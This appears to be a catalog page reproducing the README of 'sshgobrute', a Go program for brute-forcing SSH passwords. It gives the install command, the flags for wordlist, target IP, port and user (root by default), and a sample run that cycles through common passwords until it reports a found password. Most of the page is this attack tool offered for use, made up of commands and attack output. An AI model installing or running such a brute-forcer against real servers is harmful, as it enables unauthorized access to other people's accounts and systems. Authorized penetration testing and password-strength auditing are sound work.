Sshgobrute
Small golang program for ssh brute force attacks
Install / Use
/learn @aldenso/SshgobruteREADME
sshgobrute
This is a program written in Golang for ssh brute force attacks, needs improvements but works well and is fast.
go get github.com/aldenso/sshgobrute
sshgobrute --help
Usage of sshgobrute:
-file string
indicate wordlist file to use (default "wordlistfile.txt")
-ip string
indicate the ip address to brute force (default "192.168.125.100")
-port int
indicate port to brute force (default 22)
-timer duration
set timeout to ssh dial response (ex:300ms), don't set this too low (default 200ms)
-user string
indicate user to brute force (default "root")
sshgobrute -user username -timer=200ms
file: wordlistfile.txt
ip: 192.168.125.100
port: 22
user: username
timer: 200ms
additional args: []
Failed: 123456 ---Failed: 12345 ---Failed: money ---Failed: password ---Failed:
mickey ---Failed: password1 ---Failed: 123456789 ---Failed: 12345678 ---Failed:
.
.
.
---Failed: randy ---Failed: reddog ---Failed: rebecca ---
+++ Pattern found: SuperSecret +++
Completed in 60.273904113 seconds
+++ FOUND +++
If the sshd is using "PasswordAuthentication no" it won't work.
Related Skills
node-connect
351.4kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
110.7kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
351.4kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
351.4kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
